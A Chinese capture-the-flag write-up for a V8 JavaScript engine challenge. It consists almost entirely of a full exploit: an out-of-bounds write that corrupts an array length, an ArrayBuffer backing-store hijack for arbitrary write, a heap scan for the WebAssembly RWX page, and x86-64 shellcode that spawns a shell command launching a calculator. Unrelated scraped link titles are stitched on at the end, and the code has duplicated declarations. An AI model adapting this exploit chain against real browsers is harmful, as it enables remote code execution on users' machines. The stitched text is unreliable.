做的第一道存在指针压缩机制的V8题,通过小越界写修改length构造大越界读写,然后利用arraybuffer的backing store构造任意地址写,利用wasm rwx段地址的特点以及堆空间的分布,搜索到rwx段的具体地址,然后利用任意地址写将shellcode写到rwx段上去即可。
var buf = new ArrayBuffer(0x8);
var dv = new DataView(buf);
var buf =new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
//
function f2i(f)
{float64[0] = f;return bigUint64[0];
}
//
function i2f(i)
{bigUint64[0] = i;return float64[0];
}
function p64(val) {dv.setUint32(0,val & 0xFFFFFFFF,true);dv.setUint32(0x4,val >> 32,true);var float_val = dv.getFloat64(0,true);return float_val;
}
function p64(low4,high4) {dv.setUint32(0,low4,true);dv.setUint32(0x4,high4,true);var float_val = dv.getFloat64(0,true);return float_val;
}
function u64(val){dv.setFloat64(0,val,true);return dv.getBigInt64(0,true)
}
function u64_l(val) {dv.setFloat64(0,val,true);return dv.getUint32(0,true);
}function u64_h(val) {dv.setFloat64(0,val,true);return dv.getUint32(0x4,true);
}
function hex(i)
{return i.toString(16).padStart(16, "0");
}
var float_array=[];
float_array[0]=1.1;
float_array.push(1.1,2.2,3.3,4.4,5.5,6.6);
var victim=new Array(1.1,2.2);
var ar_bf=new ArrayBuffer(0x100);
var float_map=u64_l(float_array[17]);
console.log("[*] float_map is 0x"+hex(float_map));
var elements=u64_l(float_array[18]);
float_array[18]=p64(elements,0x10000000);const wasmCode = new Uint8Array([0x00,0x61,0x73,0x6D,0x01,0x00,0x00,0x00,0x01,0x85,0x80,0x80,0x80,0x00,0x01,0x60,0x00,0x01,0x7F,0x03,0x82,0x80,0x80,0x80,0x00,0x01,0x00,0x04,0x84,0x80,0x80,0x80,0x00,0x01,0x70,0x00,0x00,0x05,0x83,0x80,0x80,0x80,0x00,0x01,0x00,0x01,0x06,0x81,0x80,0x80,0x80,0x00,0x00,0x07,0x91,0x80,0x80,0x80,0x00,0x02,0x06,0x6D,0x65,0x6D,0x6F,0x72,0x79,0x02,0x00,0x04,0x6D,0x61,0x69,0x6E,0x00,0x00,0x0A,0x8A,0x80,0x80,0x80,0x00,0x01,0x84,0x80,0x80,0x80,0x00,0x00,0x41,0x2A,0x0B]);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;var rwx_addr;
var rwx_addr_l;
var rwx_addr_h;
for(let i=0x100;i>=1;i--)
{ rwx_addr=f2i(victim[0x31400+i]);if(rwx_addr%0x1000n==0n&&rwx_addr!=0n&&rwx_addr%0x100000000n!=0n)break;
}
console.log("[*]rwx_addr is 0x"+hex(rwx_addr));
rwx_addr_l=rwx_addr%0x100000000n;
rwx_addr_h=rwx_addr>>32n;victim[4]=p64(0,Number(rwx_addr_l));
victim[5]=p64(Number(rwx_addr_h),0);
victim[6]=p64(0,2);
var adv = new DataView(ar_bf);
for (var i=0;i<shellcode.length;i++) {adv.setUint8(i,shellcode[i], true);
}
//%SystemBreak();
func();
)
覆盖优化 - 附代码)
*(c-b)的值 2023年9月c++一级 电子学会中小学生软件编程C++等级考试一级真题答案解析)
![[Android] ubuntu虚拟机上搭建 Waydroid 环境](http://pic.xiahunao.cn/[Android] ubuntu虚拟机上搭建 Waydroid 环境)
面试题 36:二叉搜索树与双向链表)
